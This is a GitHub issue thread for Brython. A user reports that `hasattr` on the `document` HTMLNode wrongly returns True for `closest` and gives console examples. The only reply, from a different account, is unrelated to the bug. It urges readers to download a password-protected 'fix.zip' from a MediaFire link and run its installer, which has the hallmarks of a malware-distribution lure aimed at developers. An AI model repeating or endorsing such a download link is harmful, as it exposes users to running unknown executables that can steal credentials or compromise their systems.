### ISSUE TITLE
The function call of `hasattr` with an instance of `HTMLNode` as first parameter does not behave as expected.

### ISSUE THREAD

**Issue by moepnse** [brython-dev/brython#2489]
Hey!

In the following example, `hasattr` should return `False` instead of `True` and the `closest` call should result in an `AttributeError` instead of a `JavascriptError`.

```python
Brython 3.12.4 on Netscape 5.0 (Windows)
Type "help", "copyright", "credits" or "license" for more information.
>>> from browser import document
>>> hasattr(document, "closest")
True
>>> document.closest("div")
Traceback (most recent call last):
JavascriptError: TypeError: self.closest is not a function
>>>
```
As you can see, Javascript behaves differently:
```javascript
>>> "closest" in document
false
>>> document.hasOwnProperty("closest")
false
```

Thank you in advance!

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
